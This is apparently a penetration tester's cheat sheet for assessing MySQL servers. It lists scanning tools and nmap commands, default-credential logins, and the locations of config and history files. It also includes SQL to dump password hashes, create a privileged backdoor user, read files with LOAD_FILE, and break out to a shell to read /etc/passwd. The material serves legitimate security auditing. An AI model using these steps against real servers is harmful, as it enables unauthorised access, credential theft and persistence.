Nstealth
HP Bruteforce
Hydra
Acunetix
Examine Configuration Files
path.properties
mx.log
CLIClientConfig.cfg
database.props
pg_hba.conf
jboss-service.xml
.namazurc
Enumeration
nmap -A -n -p3306 <IP Address>
nmap -A -n -Pn --script=all -p3306 <IP Address> (runs every NSE script, intrusive ones included; --script=mysql-* is the narrower choice against a production host)
telnet IP_Address 3306
use test; select * from test; (from the mysql client; the telnet session above only shows the server greeting and version string, SQL cannot be typed over it)
To check for other DBs: show databases;
Administration
MySQL Network Scanner
MySQL GUI Tools
mysqlshow
mysqlbinlog
Manual Checks
Default usernames and passwords
username: root password:
testing
mysql -h <Hostname> -u root
mysql -h <Hostname> -u root@localhost
mysql -h <Hostname>
mysql -h <Hostname> -u ""@localhost
Configuration Files
Operating System
windows
config.ini
my.ini
windows\my.ini
winnt\my.ini
<InstDir>/mysql/data/
unix
my.cnf
/etc/my.cnf
/etc/mysql/my.cnf
/var/lib/mysql/my.cnf
~/.my.cnf
Command History
~/.mysql.history
Log Files
connections.log
update.log
common.log
To run many sql commands at once -- mysql -u username -p < manycommands.sql
MySQL data directory (Location specified in my.cnf)
Parent dir = data directory
mysql
test
information_schema (Key information in MySQL)
Complete table list -- select table_schema,table_name from tables;
Exact privileges -- select grantee, table_schema, privilege_type FROM schema_privileges;
File privileges -- select user,file_priv from mysql.user where user='root';
Version -- select version();
Load a specific file -- SELECT LOAD_FILE('FILENAME');
SSL Check
mysql> show variables like 'have_openssl';
If no rows are returned at all, the build itself does not support SSL connections and probably needs to be recompiled. If the value is DISABLED, the server simply was not started with SSL and this is easily fixed.
Privilege Escalation
Current Level of access
mysql>select user();
mysql>select user,password,create_priv,insert_priv,update_priv,alter_priv,delete_priv,drop_priv from mysql.user where user='OUTPUT OF select user()';
Access passwords
mysql> use mysql
mysql> select user,password from user;
Create a new user and grant him privileges
mysql>create user test identified by 'test';
mysql> grant SELECT,CREATE,DROP,UPDATE,DELETE,INSERT on *.* to mysql identified by 'mysql' WITH GRANT OPTION;
Break into a shell
mysql> \! cat /etc/passwd
mysql> \! bash
SQL injection
mysql-miner.pl
mysql-miner.pl http://target/ expected_string database
http://www.imperva.com/resources/adc/sql_injection_signatures_evasion.html
http://www.justinshattuck.com/2007/01/18/mysql-injection-cheat-sheet/
References
Design Weaknesses
MySQL running as root
Exposed publicly on Internet
http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=mysql
http://search.securityfocus.com/swsearch?sbm=%2F&metaname=alldoc&query=mysql&x=0&y=0